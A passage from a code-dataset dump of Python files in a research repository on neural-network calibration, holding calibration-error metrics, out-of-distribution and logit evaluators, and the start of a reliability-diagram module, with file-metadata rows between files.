bin_dict[i] = {}
_bin_initializer(bin_dict, num_bins)
num_test_samples = len(confs)
for i in range(0, num_test_samples):
confidence = confs[i]
prediction = preds[i]
label = labels[i]
binn = int(math.ceil(((num_bins * confidence) - 1)))
bin_dict[binn][COUNT] = bin_dict[binn][COUNT] + 1
bin_dict[binn][CONF] = bin_dict[binn][CONF] + confidence
bin_dict[binn][ACC] = bin_dict[binn][ACC] + \
(1 if (label == prediction) else 0)
for binn in range(0, num_bins):
if (bin_dict[binn][COUNT] == 0):
bin_dict[binn][BIN_ACC] = 0
bin_dict[binn][BIN_CONF] = 0
else:
bin_dict[binn][BIN_ACC] = float(
bin_dict[binn][ACC]) / bin_dict[binn][COUNT]
bin_dict[binn][BIN_CONF] = bin_dict[binn][CONF] / \
float(bin_dict[binn][COUNT])
return bin_dict
def expected_calibration_error(confs, preds, labels, num_bins=10):
bin_dict = _populate_bins(confs, preds, labels, num_bins)
num_samples = len(labels)
ece = 0
for i in range(num_bins):
bin_accuracy = bin_dict[i][BIN_ACC]
bin_confidence = bin_dict[i][BIN_CONF]
bin_count = bin_dict[i][COUNT]
ece += (float(bin_count) / num_samples) * \
abs(bin_accuracy - bin_confidence)
return ece
def maximum_calibration_error(confs, preds, labels, num_bins=10):
bin_dict = _populate_bins(confs, preds, labels, num_bins)
ce = []
for i in range(num_bins):
bin_accuracy = bin_dict[i][BIN_ACC]
bin_confidence = bin_dict[i][BIN_CONF]
ce.append(abs(bin_accuracy - bin_confidence))
return max(ce)
def average_calibration_error(confs, preds, labels, num_bins=10):
bin_dict = _populate_bins(confs, preds, labels, num_bins)
non_empty_bins = 0
ace = 0
for i in range(num_bins):
bin_accuracy = bin_dict[i][BIN_ACC]
bin_confidence = bin_dict[i][BIN_CONF]
bin_count = bin_dict[i][COUNT]
if bin_count > 0:
non_empty_bins += 1
ace += abs(bin_accuracy - bin_confidence)
return ace / float(non_empty_bins)
def l2_error(confs, preds, labels, num_bins=15):
bin_dict = _populate_bins(confs, preds, labels, num_bins)
num_samples = len(labels)
l2_sum = 0
for i in range(num_bins):
bin_accuracy = bin_dict[i][BIN_ACC]
bin_confidence = bin_dict[i][BIN_CONF]
bin_count = bin_dict[i][COUNT]
l2_sum += (float(bin_count) / num_samples) * \
(bin_accuracy - bin_confidence)**2
l2_error = math.sqrt(l2_sum)
return l2_error
def test_classification_net_logits(logits, labels):
'''
This function reports classification accuracy and confusion matrix given logits and labels
from a model.
'''
labels_list = []
predictions_list = []
confidence_vals_list = []
softmax = F.softmax(logits, dim=1)
confidence_vals, predictions = torch.max(softmax, dim=1)
labels_list.extend(labels.cpu().numpy().tolist())
predictions_list.extend(predictions.cpu().numpy().tolist())
confidence_vals_list.extend(confidence_vals.cpu().numpy().tolist())
accuracy = accuracy_score(labels_list, predictions_list)
return confusion_matrix(labels_list, predictions_list), accuracy, labels_list,\
predictions_list, confidence_vals_list
def test_classification_net(model, data_loader, device):
'''
This function reports classification accuracy and confusion matrix over a dataset.
'''
model.eval()
labels_list = []
predictions_list = []
confidence_vals_list = []
with torch.no_grad():
for i, (data, label) in enumerate(data_loader):
data = data.to(device)
label = label.to(device)
logits = model(data)
softmax = F.softmax(logits, dim=1)
confidence_vals, predictions = torch.max(softmax, dim=1)
labels_list.extend(label.cpu().numpy().tolist())
predictions_list.extend(predictions.cpu().numpy().tolist())
confidence_vals_list.extend(confidence_vals.cpu().numpy().tolist())
accuracy = accuracy_score(labels_list, predictions_list)
return confusion_matrix(labels_list, predictions_list), accuracy, labels_list,\
predictions_list, confidence_vals_list
@torch.no_grad()
def model_prediction(model, data_loader, device):
model.eval()
all_predicts, all_labels = None, None
for i, (data, label) in enumerate(data_loader):
data, label = data.to(device), label.to(device)
logits = model(data)
predicts = F.softmax(logits, dim=1)
if all_predicts is None:
all_predicts = predicts.cpu().numpy()
all_labels = label.cpu().numpy()
else:
all_predicts = np.concatenate((all_predicts, predicts.cpu().numpy()), axis=0)
all_labels = np.concatenate((all_labels, label.cpu().numpy()))
return all_predicts, all_labels
# Calibration error scores in the form of loss metrics
class ECELoss(nn.Module):
'''
Compute ECE (Expected Calibration Error)
'''
def __init__(self, n_bins=15):
super(ECELoss, self).__init__()
bin_boundaries = torch.linspace(0, 1, n_bins + 1)
self.bin_lowers = bin_boundaries[:-1]
self.bin_uppers = bin_boundaries[1:]
def forward(self, logits, labels):
softmaxes = F.softmax(logits, dim=1)
confidences, predictions = torch.max(softmaxes, 1)
accuracies = predictions.eq(labels)
ece = torch.zeros(1, device=logits.device)
for bin_lower, bin_upper in zip(self.bin_lowers, self.bin_uppers):
# Calculated |confidence - accuracy| in each bin
in_bin = confidences.gt(bin_lower.item()) * confidences.le(bin_upper.item())
prop_in_bin = in_bin.float().mean()
if prop_in_bin.item() > 0:
accuracy_in_bin = accuracies[in_bin].float().mean()
avg_confidence_in_bin = confidences[in_bin].mean()
ece += torch.abs(avg_confidence_in_bin - accuracy_in_bin) * prop_in_bin
return ece
class AdaptiveECELoss(nn.Module):
'''
Compute Adaptive ECE
'''
def __init__(self, n_bins=15):
super(AdaptiveECELoss, self).__init__()
self.nbins = n_bins
def histedges_equalN(self, x):
npt = len(x)
return np.interp(np.linspace(0, npt, self.nbins + 1),
np.arange(npt),
np.sort(x))
def forward(self, logits, labels):
softmaxes = F.softmax(logits, dim=1)
confidences, predictions = torch.max(softmaxes, 1)
accuracies = predictions.eq(labels)
n, bin_boundaries = np.histogram(confidences.cpu().detach(), self.histedges_equalN(confidences.cpu().detach()))
#print(n,confidences,bin_boundaries)
self.bin_lowers = bin_boundaries[:-1]
self.bin_uppers = bin_boundaries[1:]
ece = torch.zeros(1, device=logits.device)
for bin_lower, bin_upper in zip(self.bin_lowers, self.bin_uppers):
# Calculated |confidence - accuracy| in each bin
in_bin = confidences.gt(bin_lower.item()) * confidences.le(bin_upper.item())
prop_in_bin = in_bin.float().mean()
if prop_in_bin.item() > 0:
accuracy_in_bin = accuracies[in_bin].float().mean()
avg_confidence_in_bin = confidences[in_bin].mean()
ece += torch.abs(avg_confidence_in_bin - accuracy_in_bin) * prop_in_bin
return ece
class ClasswiseECELoss(nn.Module):
'''
Compute Classwise ECE
'''
def __init__(self, n_bins=15):
super(ClasswiseECELoss, self).__init__()
bin_boundaries = torch.linspace(0, 1, n_bins + 1)
self.bin_lowers = bin_boundaries[:-1]
self.bin_uppers = bin_boundaries[1:]
def forward(self, logits, labels):
num_classes = int((torch.max(labels) + 1).item())
softmaxes = F.softmax(logits, dim=1)
per_class_sce = None
for i in range(num_classes):
class_confidences = softmaxes[:, i]
class_sce = torch.zeros(1, device=logits.device)
labels_in_class = labels.eq(i) # one-hot vector of all positions where the label belongs to the class i
for bin_lower, bin_upper in zip(self.bin_lowers, self.bin_uppers):
in_bin = class_confidences.gt(bin_lower.item()) * class_confidences.le(bin_upper.item())
prop_in_bin = in_bin.float().mean()
if prop_in_bin.item() > 0:
accuracy_in_bin = labels_in_class[in_bin].float().mean()
avg_confidence_in_bin = class_confidences[in_bin].mean()
class_sce += torch.abs(avg_confidence_in_bin - accuracy_in_bin) * prop_in_bin
if (i == 0):
per_class_sce = class_sce
else:
per_class_sce = torch.cat((per_class_sce, class_sce), dim=0)
sce = torch.mean(per_class_sce)
return sce
# Calibration error scores in the form of loss metrics
class OELoss(nn.Module):
'''
Compute OE (Overconfidence Error)
'''
def __init__(self, n_bins=15):
super(OELoss, self).__init__()
bin_boundaries = torch.linspace(0, 1, n_bins + 1)
self.bin_lowers = bin_boundaries[:-1]
self.bin_uppers = bin_boundaries[1:]
def forward(self, logits, labels):
softmaxes = F.softmax(logits, dim=1)
confidences, predictions = torch.max(softmaxes, 1)
accuracies = predictions.eq(labels)
oe = torch.zeros(1, device=logits.device)
for bin_lower, bin_upper in zip(self.bin_lowers, self.bin_uppers):
# Calculated |confidence - accuracy| in each bin
in_bin = confidences.gt(bin_lower.item()) * confidences.le(bin_upper.item())
prop_in_bin = in_bin.float().mean()
if prop_in_bin.item() > 0:
accuracy_in_bin = accuracies[in_bin].float().mean()
avg_confidence_in_bin = confidences[in_bin].mean()
oe += avg_confidence_in_bin * F.relu(avg_confidence_in_bin - accuracy_in_bin) * prop_in_bin
return oe
class UELoss(nn.Module):
'''
Compute UE (Underconfidence Error)
'''
def __init__(self, n_bins=15):
super(UELoss, self).__init__()
bin_boundaries = torch.linspace(0, 1, n_bins + 1)
self.bin_lowers = bin_boundaries[:-1]
self.bin_uppers = bin_boundaries[1:]
def forward(self, logits, labels):
softmaxes = F.softmax(logits, dim=1)
confidences, predictions = torch.max(softmaxes, 1)
accuracies = predictions.eq(labels)
ue = torch.zeros(1, device=logits.device)
for bin_lower, bin_upper in zip(self.bin_lowers, self.bin_uppers):
# Calculated |confidence - accuracy| in each bin
in_bin = confidences.gt(bin_lower.item()) * confidences.le(bin_upper.item())
prop_in_bin = in_bin.float().mean()
if prop_in_bin.item() > 0:
accuracy_in_bin = accuracies[in_bin].float().mean()
avg_confidence_in_bin = confidences[in_bin].mean()
ue += avg_confidence_in_bin * F.relu(accuracy_in_bin - avg_confidence_in_bin) * prop_in_bin
return ue | 12,287 | Python | .py | 277 | 35.971119 | 119 | 0.616208 | cvlab-yonsei/RankMixup | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,887 | ood_evaluator.py | cvlab-yonsei_RankMixup/calibrate/evaluation/ood_evaluator.py | import logging
from terminaltables import AsciiTable
import numpy as np
import torch
from torch import nn
import torch.nn.functional as F
import wandb
from sklearn.metrics import top_k_accuracy_score, roc_auc_score
from .evaluator import DatasetEvaluator
from .metrics import ECELoss, AdaptiveECELoss, ClasswiseECELoss
from .reliability_diagram import ReliabilityDiagram
from calibrate.utils.torch_helper import to_numpy
from calibrate.utils.constants import EPS
logger = logging.getLogger(__name__)
class OODEvaluator(DatasetEvaluator):
def __init__(self, num_classes) -> None:
super().__init__()
self.num_classes = num_classes
self.reset()
def reset(self) -> None:
self.in_preds = None
self.in_labels = None
self.out_preds = None
self.out_labels = None
def main_metric(self):
return "auc_ent"
def num_samples(self):
return (
(
self.in_labels.shape[0]
if self.in_labels is not None
else 0
)
+ (
self.out_labels.shape[0]
if self.out_labels is not None
else 0
)
)
def _update(self, all_preds, all_labels, pred, label):
if all_preds is None:
all_preds = pred
all_labels = label
else:
all_preds = np.concatenate((all_preds, pred), axis=0)
all_labels = np.concatenate((all_labels, label), axis=0)
def update(self, pred: np.ndarray, label: np.ndarray,
in_dist: bool = True) -> float:
"""update
Args:
pred (np.ndarray): n x num_classes
label (np.ndarray): n x 1
Returns:
float: acc
"""
assert pred.shape[0] == label.shape[0]
if in_dist:
if self.in_preds is None:
self.in_preds = pred
self.in_labels = label
else:
self.in_preds = np.concatenate((self.in_preds, pred), axis=0)
self.in_labels = np.concatenate((self.in_labels, label), axis=0)
else:
if self.out_preds is None:
self.out_preds = pred
self.out_labels = label
else:
self.out_preds = np.concatenate((self.out_preds, pred), axis=0)
self.out_labels = np.concatenate((self.out_labels, label), axis=0)
pred_label = np.argmax(pred, axis=1)
acc = (pred_label == label).astype("int").sum() / label.shape[0]
# acc = top_k_accuracy_score(label, pred, k=1)
self.curr = {"acc": acc}
return acc
def curr_score(self):
return self.curr
def entropy(self, preds):
log_preds = np.log(preds + EPS)
entropies = - np.sum(preds * log_preds, axis=1) / np.log(self.num_classes)
return entropies
def mean_score(self, print=False, all_metric=True):
# acc = top_k_accuracy_score(self.labels, self.preds, k=1)
in_labels_entropies = np.zeros(self.in_labels.shape)
in_preds_entropies = self.entropy(self.in_preds)
out_labels_entropies = np.ones(self.out_labels.shape)
out_preds_entropies = self.entropy(self.out_preds)
labels_entropies = np.concatenate(
(in_labels_entropies, out_labels_entropies),
axis=0
)
preds_entropies = np.concatenate(
(in_preds_entropies, out_preds_entropies),
axis=0
)
in_labels_confidences = np.ones(self.in_labels.shape)
in_preds_confidences = np.max(self.in_preds, axis=1)
out_labels_confidences = np.zeros(self.out_labels.shape)
out_preds_confidences = np.max(self.out_preds, axis=1)
labels_confidences = np.concatenate(
(in_labels_confidences, out_labels_confidences),
axis=0
)
preds_confidences = np.concatenate(
(in_preds_confidences, out_preds_confidences),
axis=0
)
auc_ent = roc_auc_score(labels_entropies, preds_entropies)
auc_conf = roc_auc_score(labels_confidences, preds_confidences)
metric = {"auc_ent": auc_ent, "auc_conf": auc_conf}
columns = ["samples", "auc_ent", "auc_conf"]
table_data = [columns]
table_data.append(
[
self.num_samples(),
"{:.5f}".format(auc_ent),
"{:.5f}".format(auc_conf)
]
)
if print:
table = AsciiTable(table_data)
logger.info("\n" + table.table)
if all_metric:
return metric, table_data
else:
return metric[self.main_metric()], table_data
def wandb_score_table(self):
_, table_data = self.mean_score(print=False)
return wandb.Table(
columns=table_data[0],
data=table_data[1:]
)
| 4,958 | Python | .py | 132 | 27.545455 | 82 | 0.576995 | cvlab-yonsei/RankMixup | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,888 | __init__.py | cvlab-yonsei_RankMixup/calibrate/evaluation/__init__.py | from .metrics import (
expected_calibration_error, maximum_calibration_error,
l2_error, test_classification_net
)
from .plots import reliability_plot, bin_strength_plot
from .meter import AverageMeter, LossMeter, logit_stats_v2, logit_diff
from .classification_evaluator import ClassificationEvaluator, LT_ClassificationEvaluator
from .calibrate_evaluator import CalibrateEvaluator
from .logits_evaluator import LogitsEvaluator
from .segment_evaluator import SegmentEvaluator
from .segment_calibrate_evaluator import SegmentCalibrateEvaluator
from .sgement_logits_evaluator import SegmentLogitsEvaluator
from .probs_evaluator import ProbsEvaluator
from .ood_evaluator import OODEvaluator
| 697 | Python | .py | 14 | 48.142857 | 89 | 0.863636 | cvlab-yonsei/RankMixup | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,889 | evaluator.py | cvlab-yonsei_RankMixup/calibrate/evaluation/evaluator.py | from abc import ABCMeta, abstractmethod
class DatasetEvaluator(metaclass=ABCMeta):
"""
Base class for a dataset evaluator
"""
@abstractmethod
def reset(self):
"""
Preparation for a new round of evaluation.
Should be called before starting a round of evaluation.
"""
pass
@abstractmethod
def update(self):
"""
Update status given a mini-batch results
"""
pass
def curr_score(self):
"""
Return curr score after last batch
"""
pass
@abstractmethod
def mean_score(self):
"""
Return mean score across all classes/samples
"""
pass
def class_score(self):
"""
Return score for different classes
"""
pass
@abstractmethod
def num_samples(self):
"""
return the evaluated samples
"""
pass
@abstractmethod
def main_metric(self):
"return the name of the main metric"
pass
| 1,042 | Python | .py | 44 | 16.227273 | 63 | 0.576768 | cvlab-yonsei/RankMixup | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,890 | sgement_logits_evaluator.py | cvlab-yonsei_RankMixup/calibrate/evaluation/sgement_logits_evaluator.py | import numpy as np
from .evaluator import DatasetEvaluator
class SegmentLogitsEvaluator(DatasetEvaluator):
"""get logit differences
mean_diff : (max value of logits - value of logits).mean()
max_diff : (max value of logits - value of logits).max()
margin : max value of logits - second max value of logits
Args:
DatasetEvaluator ([type]): [description]
"""
def __init__(self, ignore_index: int = -1) -> None:
self.ignore_index = ignore_index
self.reset()
def reset(self) -> None:
self.count = 0
self.mean_diffs = []
self.max_diffs = []
self.margins = []
def num_samples(self):
return self.count
def main_metric(self):
return "mean_diffs"
def update(self, logits: np.ndarray, labels: np.ndarray):
n, c, x, y = logits.shape
logits = np.einsum("ncxy->nxyc", logits)
logits = np.reshape(logits, (n * x * y, c))
labels = np.reshape(labels, (-1))
if self.ignore_index >= 0:
index = np.nonzero(labels != self.ignore_index)[0]
logits = logits[index, :]
labels = labels[index]
n = logits.shape[0]
self.count += n
sort_inds = np.argsort(logits, axis=1)
max_values = np.zeros(n)
second_max_values = np.zeros(n)
min_values = np.zeros(n)
for i in range(n):
max_values[i] = logits[i, sort_inds[i, -1]]
second_max_values[i] = logits[i, sort_inds[i, -2]]
min_values[i] = logits[i, sort_inds[i, 0]]
# max_values = logits[:, sort_inds[:, -1]]
# second_max_values = logits[:, sort_inds[:, -2]]
diffs = np.repeat(max_values.reshape(n, 1), logits.shape[1], axis=1) - logits
# self.mean_diffs.append(diffs.sum())
self.mean_diffs.append(np.sum(diffs, axis=1) / (logits.shape[1] - 1))
self.max_diffs.append(np.max(diffs, axis=1))
margins = max_values - second_max_values
self.margins.append(margins)
return np.mean(self.mean_diffs[-1])
def curr_score(self):
return {
self.main_metric(): np.mean(self.mean_diffs[-1])
}
def mean_score(self, all_metric=True):
mean_diffs = np.concatenate(self.mean_diffs)
max_diffs = np.concatenate(self.max_diffs)
margins = np.concatenate(self.margins)
if not all_metric:
return np.mean(self.mean_diffs)
metric = {}
metric["mean_diffs"] = np.mean(mean_diffs)
metric["max_diffs"] = np.mean(max_diffs)
n_top10 = int(self.count * 0.1)
metric["max_diffs_top10"] = np.mean(
max_diffs[max_diffs.argsort()[-n_top10:]]
)
n_top5 = int(self.count * 0.05)
metric["max_diffs_top5"] = np.mean(
max_diffs[max_diffs.argsort()[-n_top5:]]
)
n_top1 = int(self.count * 0.01)
metric["max_diffs_top1"] = np.mean(
max_diffs[max_diffs.argsort()[-n_top1:]]
)
# metric["max_max_diffs"] = np.max(max_diffs)
metric["margin"] = np.mean(margins)
return metric
| 3,149 | Python | .py | 78 | 31.538462 | 85 | 0.575827 | cvlab-yonsei/RankMixup | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,891 | probs_evaluator.py | cvlab-yonsei_RankMixup/calibrate/evaluation/probs_evaluator.py | import numpy as np
from calibrate.utils.constants import EPS
from .evaluator import DatasetEvaluator
class ProbsEvaluator(DatasetEvaluator):
"""get probs (softmax output) statics
max_probs / confidence : probs.max()
mean_probs : probs.mean()
kl_div : kl divergence between probs and 1/num_classes
l1_div : l1 between probs and 1/num_classes
"""
def __init__(self, num_classes) -> None:
self.num_classes = num_classes
self.reset()
def reset(self) -> None:
self.count = 0
self.max_probs = []
self.mean_probs = []
self.kl_divs = []
self.l1_divs = []
def num_samples(self):
return self.count
def main_metric(self):
return "max_prob"
def kl(self, probs):
y = np.log(1 / self.num_classes) - np.log(probs + EPS)
y = np.mean(y, axis=1)
return y
def l1(self, probs):
y = np.abs(1 / self.num_classes - probs)
y = np.mean(y, axis=1)
return y
def update(self, probs: np.ndarray):
n = probs.shape[0]
self.count += n
max_probs = np.max(probs, axis=1)
mean_probs = np.mean(probs, axis=1)
kl_divs = self.kl(probs)
l1_divs = self.l1(probs)
self.max_probs.append(max_probs)
self.mean_probs.append(mean_probs)
self.kl_divs.append(kl_divs)
self.l1_divs.append(l1_divs)
return float(np.mean(max_probs))
def curr_score(self):
return {self.main_metric(): float(np.mean(self.max_probs[-1]))}
def mean_score(self, all_metric=True):
max_probs = np.concatenate(self.max_probs)
mean_probs = np.concatenate(self.mean_probs)
kl_divs = np.concatenate(self.kl_divs)
l1_divs = np.concatenate(self.l1_divs)
if not all_metric:
return np.mean(max_probs)
metric = {}
metric["max_prob"] = float(np.mean(max_probs))
metric["mean_prob"] = float(np.mean(mean_probs))
metric["kl_div"] = float(np.mean(kl_divs))
metric["l1_div"] = float(np.mean(l1_divs))
return metric
| 2,122 | Python | .py | 58 | 28.758621 | 71 | 0.601662 | cvlab-yonsei/RankMixup | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,892 | reliability_diagram.py | cvlab-yonsei_RankMixup/calibrate/evaluation/reliability_diagram.py | from typing import Union, Iterable, List, Tuple
import numpy as np
from scipy.stats import norm
from scipy.interpolate import interp1d, griddata
from scipy.stats import binned_statistic_dd
from functools import wraps
import matplotlib
# matplotlib.use("Agg")
import matplotlib.pyplot as plt
# import tikzplotlib
def accepts(*types):
"""
Decorator for function arg check
"""
def check_accepts(f):
assert len(types)+1 == f.__code__.co_argcount, "Unequal amount of defined parameter types and existing parameters."
@wraps(f)
def new_f(*args, **kwds):
for i, (a, t) in enumerate(zip(args[1:], types), start=1):
if t is None:
continue
if type(t) == tuple:
for st in t:
if type(a) == st:
break
else:
raise AssertionError("arg \'%s\' does not match one of types %s" % (f.__code__.co_varnames[i], str(t)))
else:
assert isinstance(a, t), "arg \'%s\' does not match %s" % (f.__code__.co_varnames[i],t)
return f(*args, **kwds)
new_f.__name__ = f.__name__
return new_f
return check_accepts
def hpdi(x, prob=0.90, axis=0):
"""
Computes "highest posterior density interval" (HPDI) which is the narrowest
interval with probability mass ``prob``. This method has been adapted from NumPyro:
`Find NumPyro original implementation <https://github.com/pyro-ppl/numpyro/blob/v0.2.4/numpyro/diagnostics.py#L191>_`.
Parameters
----------
x : np.ndarray
Input array.
prob : float, optional, default: 0.9
Probability mass of samples within the interval.
axis : int, optional, default: 0
The dimension to calculate hpdi.
Returns
-------
np.ndarray
Quantiles of ``x`` at ``(1 - prob) / 2`` and ``(1 + prob) / 2``.
"""
x = np.swapaxes(x, axis, 0)
sorted_x = np.sort(x, axis=0)
mass = x.shape[0]
index_length = int(prob * mass)
intervals_left = sorted_x[:(mass - index_length)]
intervals_right = sorted_x[index_length:]
intervals_length = intervals_right - intervals_left
index_start = intervals_length.argmin(axis=0)
index_end = index_start + index_length
hpd_left = np.take_along_axis(sorted_x, index_start[None, ...], axis=0)
hpd_left = np.swapaxes(hpd_left, axis, 0)
hpd_right = np.take_along_axis(sorted_x, index_end[None, ...], axis=0)
hpd_right = np.swapaxes(hpd_right, axis, 0)
return np.concatenate([hpd_left, hpd_right], axis=axis)
class _Miscalibration(object):
"""
Generic base class to calculate Average/Expected/Maximum Calibration Error.
ACE [1]_, ECE [2]_ and MCE [2]_ are used for measuring miscalibration on classification.
The according variants D-ACE/D-ECE/D-MCE are used for object detection [3]_.
Parameters
----------
bins : int or iterable, default: 10
Number of bins used by the Histogram Binning.
On detection mode: if int, use same amount of bins for each dimension (nx1 = nx2 = ... = bins).
If iterable, use different amount of bins for each dimension (nx1, nx2, ... = bins).
equal_intervals : bool, optional, default: True
If True, the bins have the same width. If False, the bins are splitted to equalize
the number of samples in each bin.
detection : bool, default: False
If False, the input array 'X' is treated as multi-class confidence input (softmax)
with shape (n_samples, [n_classes]).
If True, the input array 'X' is treated as a box predictions with several box features (at least
box confidence must be present) with shape (n_samples, [n_box_features]).
sample_threshold : int, optional, default: 1
Bins with an amount of samples below this threshold are not included into the miscalibration metrics.
References
----------
.. [1] Naeini, Mahdi Pakdaman, Gregory Cooper, and Milos Hauskrecht:
"Obtaining well calibrated probabilities using bayesian binning."
Twenty-Ninth AAAI Conference on Artificial Intelligence, 2015.
`Get source online <https://www.aaai.org/ocs/index.php/AAAI/AAAI15/paper/download/9667/9958>`_
.. [2] Neumann, Lukas, Andrew Zisserman, and Andrea Vedaldi:
"Relaxed Softmax: Efficient Confidence Auto-Calibration for Safe Pedestrian Detection."
Conference on Neural Information Processing Systems (NIPS) Workshop MLITS, 2018.
`Get source online <https://openreview.net/pdf?id=S1lG7aTnqQ>`_
.. [3] Fabian Küppers, Jan Kronenberger, Amirhossein Shantia and Anselm Haselhoff:
"Multivariate Confidence Calibration for Object Detection."
The IEEE/CVF Conference on Computer Vision and Pattern Recognition (CVPR) Workshops, 2020.
`Get source online <https://openaccess.thecvf.com/content_CVPRW_2020/papers/w20/Kuppers_Multivariate_Confidence_Calibration_for_Object_Detection_CVPRW_2020_paper.pdf>`_
"""
epsilon = np.finfo(np.float).eps
@accepts((int, tuple, list), bool, bool, int)
def __init__(self, bins: Union[int, Iterable[int]] = 10, equal_intervals: bool = True,
detection: bool = False, sample_threshold: int = 1):
""" Constructor. For parameter doc see class doc. """
self.bins = bins
self.detection = detection
self.sample_threshold = sample_threshold
self.equal_intervals = equal_intervals
@classmethod
def squeeze_generic(cls, a: np.ndarray, axes_to_keep: Union[Iterable[int], int]) -> np.ndarray:
""" Squeeze input array a but keep axes defined by parameter
'axes_to_keep' even if the dimension is of size 1. """
# if type is int, convert to iterable
if type(axes_to_keep) == int:
axes_to_keep = (axes_to_keep,)
# iterate over all axes in a and check if dimension is in 'axes_to_keep' or of size 1
out_s = [s for i, s in enumerate(a.shape) if i in axes_to_keep or s != 1]
return a.reshape(out_s)
def reduce(self, histogram: np.ndarray, distribution: np.ndarray, axis: int, reduce_result: Tuple = None):
"""
Calculate the weighted mean on a given histogram based on a dedicated data distribution.
If 'reduce_result' is given, reuse the data distribution of the previous result instead of the distribution
given by 'distribution' parameter.
"""
if reduce_result is None:
# in order to determine miscalibration w.r.t. additional features (excluding confidence dimension),
# reduce the first (confidence) dimension and determine the amount of samples in the remaining bins
samples_map = np.sum(distribution, axis=axis)
# The following computation is a little bit confusing but necessary because:
# We are interested in the miscalibration score (here mainly D-ECE) as well as the confidence, accuracy and
# uncertainty for each feature bin (excluding the confidence dimension) separately.
# Thus, we need to know the total amount of samples over all confidence bins for each bin combination in the
# remaining dimensions separately. This amount of samples for each bin combination is then treated as the total
# amount of samples in order to compute the D-ECE in the current bin combination properly.
# extend the reduced histogram again
extended_hist = np.repeat(
np.expand_dims(samples_map, axis=axis),
distribution.shape[axis],
axis=axis
)
# get the relative amount of samples according to a certain bin combination over all confidence bins
# leave out empty bin combinations
rel_samples_hist_reduced_conf = np.divide(distribution,
extended_hist,
out=np.zeros_like(distribution),
where=extended_hist != 0)
else:
# reuse reduced data distribution from a previous call
rel_samples_hist_reduced_conf = reduce_result[1]
# now reduce confidence dimension of accuracy, confidence and uncertainty histograms
weighted_mean = np.sum(histogram * rel_samples_hist_reduced_conf, axis=axis)
return weighted_mean, rel_samples_hist_reduced_conf
def prepare(self, X: Union[Iterable[np.ndarray], np.ndarray], y: Union[Iterable[np.ndarray], np.ndarray],
batched: bool = False, uncertainty: str = None) -> Tuple[List[np.ndarray], List[np.ndarray], List[np.ndarray], List, int]:
""" Check input data. For detailed documentation of the input parameters, check "_measure" method. """
# batched: interpret X and y as multiple predictions
if not batched:
assert isinstance(X, np.ndarray), 'Parameter \'X\' must be Numpy array if not on batched mode.'
assert isinstance(y, np.ndarray), 'Parameter \'y\' must be Numpy array if not on batched mode.'
X, y = [X], [y]
# if we're in batched mode, create new lists for X and y to prevent overriding
else:
assert isinstance(X, (list, tuple)), 'Parameter \'X\' must be type list on batched mode.'
assert isinstance(y, (list, tuple)), 'Parameter \'y\' must be type list on batched mode.'
X, y = [x for x in X], [y_ for y_ in y]
# if input X is of type "np.ndarray", convert first axis to list
# this is necessary for the following operations
if isinstance(X, np.ndarray):
X = [x for x in X]
if isinstance(y, np.ndarray):
y = [y0 for y0 in y]
# empty list to collect uncertainty estimates for each sample provided in each batch
matched, sample_uncertainty = [], []
num_features = -1
for i, (batch_X, batch_y) in enumerate(zip(X, y)):
# we need at least 2 dimensions (for classification as well as for detection)
if batch_X.ndim == 1:
X[i] = batch_X = np.reshape(batch_X, (-1, 1))
# -------------------------------------------------
# process uncertainty mode first
batch_X, batch_y, batch_uncertainty = self._prepare_uncertainty(batch_X, batch_y, uncertainty)
X[i], y[i] = batch_X, batch_y
# uncertainty (std deviation) of X values of current batch
sample_uncertainty.append(batch_uncertainty)
# -------------------------------------------------
# check and prepare input data
batch_X, batch_y, batch_matched = self._prepare_input(batch_X, batch_y)
X[i], y[i] = batch_X, batch_y
matched.append(batch_matched)
# -------------------------------------------------
# check if number of features is consistent along all batches
batch_num_features = batch_X.shape[1] if self.detection and batch_X.ndim > 1 else 1
# get number of additional dimensions (if not initialized)
if num_features == -1:
num_features = batch_num_features
else:
# if number of features is not equal over all instances, raise exception
assert num_features == batch_num_features, "Unequal number of classes/features given in batched mode."
# -----------------------------------------------------
# prepare bin amount with the current amount of features
bin_bounds = self._prepare_bins(X, num_features)
return X, matched, sample_uncertainty, bin_bounds, num_features
def binning(self, bin_bounds: List, samples: np.ndarray, *values: Iterable, nan: float = 0.0) -> Tuple:
"""
Perform binning on value (and all additional values passed) based on samples.
Parameters
----------
bin_bounds : list, length=samples.shape[1]
Binning boundaries used for each dimension given in 'samples' parameter.
samples : np.ndarray of shape (n_samples, n_features)
Array used to group all samples into bins.
*values : instances np.ndarray of shape (n_samples, 1)
Arrays whose values are binned.
nan : float, optional default: 0.0
If a bin has no samples or less than defined sample_threshold, the according bin is marked as
NaN. Specify fill float to insert instead of NaN.
Returns
-------
tuple of length equal to the amount of passed value arrays with binning schemes and an additional histogram
with number of samples in each bin as well as an index tuple containing the bin indices.
"""
# determine number of samples in histogram bins
num_samples_hist, _ = np.histogramdd(samples, bins=bin_bounds)
binning_schemes = []
binning_result = None
# iterate over passed value arrays
for val in values:
binning_result = binned_statistic_dd(samples, val, statistic='mean', bins=bin_bounds, binned_statistic_result=binning_result)
hist, _, _ = binning_result
# blank out each bin that has less samples than a certain sample threshold in order
# to improve robustness of the miscalibration scores
# convert NaN entries to float
hist[num_samples_hist < self.sample_threshold] = np.nan
hist = np.nan_to_num(hist, nan=nan)
binning_schemes.append(hist)
binning_schemes.append(num_samples_hist)
_, _, idx = binning_result
# first step: expand bin numbers
# correct bin number afterwards as this variable has offset of 1
idx = np.asarray(np.unravel_index(idx, [len(bounds)+1 for bounds in bin_bounds]))
idx -= 1
# convert to tuple as this can be used for array indexing
idx = tuple([dim for dim in idx])
binning_schemes.append(idx)
return tuple(binning_schemes)
def process(self,
metric: str,
acc_hist: np.ndarray,
conf_hist: np.ndarray,
variance_hist: np.ndarray,
num_samples_hist: np.ndarray) -> Tuple[float, np.ndarray, np.ndarray, np.ndarray, np.ndarray, np.ndarray]:
"""
Determine miscalibration based on passed histograms.
Parameters
----------
metric : str
